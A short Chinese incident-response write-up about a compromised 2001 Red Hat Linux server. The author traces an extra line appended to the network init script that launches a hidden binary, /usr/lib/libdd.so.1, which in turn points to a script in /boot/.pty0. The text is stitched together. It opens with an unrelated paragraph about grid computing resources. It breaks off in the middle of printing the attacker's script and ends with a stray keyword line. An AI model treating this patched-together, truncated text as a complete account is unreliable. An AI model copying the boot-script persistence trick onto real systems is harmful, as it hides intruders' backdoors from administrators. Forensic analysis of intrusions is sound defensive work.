网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。
一、意外
时间:2001-3-11下午
地点:某台RedHat Linux机器:
#uname -a
Linux *.*.cn.net 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686unknown
俺习惯性地先进到/etc/rc.d/init.d,看了一下,马上发现异状:
#ls -la
……
-rwxr-xr-x 1 root root 2775 Mar 26 1999 netfs
-rwxr-xr-x 1 root root 5537 Mar 3 21:23 network
-rwxr-xr-x 1 root root 2408 Apr 16 1999 nfs
……
二、初步检查
明显是个新手干的嘛,network文件被人动过了,咱们用stat命令看看先:
#stat network
file: "network"
Size: 5537 Filetype: Regular File
Mode: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Device: 3,1 Inode: 269454 Links: 1
Access: Sun Mar 11 10:59:59 2001(00000.05:53:41)
Modify: Sun Mar 4 05:23:41 2001(00007.11:29:59)
Change: Sun Mar 4 05:23:41 2001(00007.11:29:59)
最后被人改动的时间是3月4号的凌晨。让我们来看看他往文件里加了什么吧:
#cat network
……
/usr/lib/libdd.so.1
就是这么一句,加在文件末尾,看来的确是手段不甚高明。瞧瞧这是个什么文件先
#file /usr/lib/libdd.so.1
/usr/lib/libdd.so.1: ELF 32-bit LSB executable, Intel 80386,version 1,
dynamically linked (uses shared libs), not stripped
哦,是个二进制的可执行文件,执行下strings看是否眼熟
#strings /usr/lib/libdd.so.1
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
system
__deregister_frame_info
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
/boot/.pty0/go.sh <--------这条信息看上去比较有趣
哦,这就简单了嘛,俺看看这里面的路径:
#cd /boot/.pty0
#cat go.sh
#!/bin/bash
f=`ls -al /boot
关键词:很酷的一篇入侵区分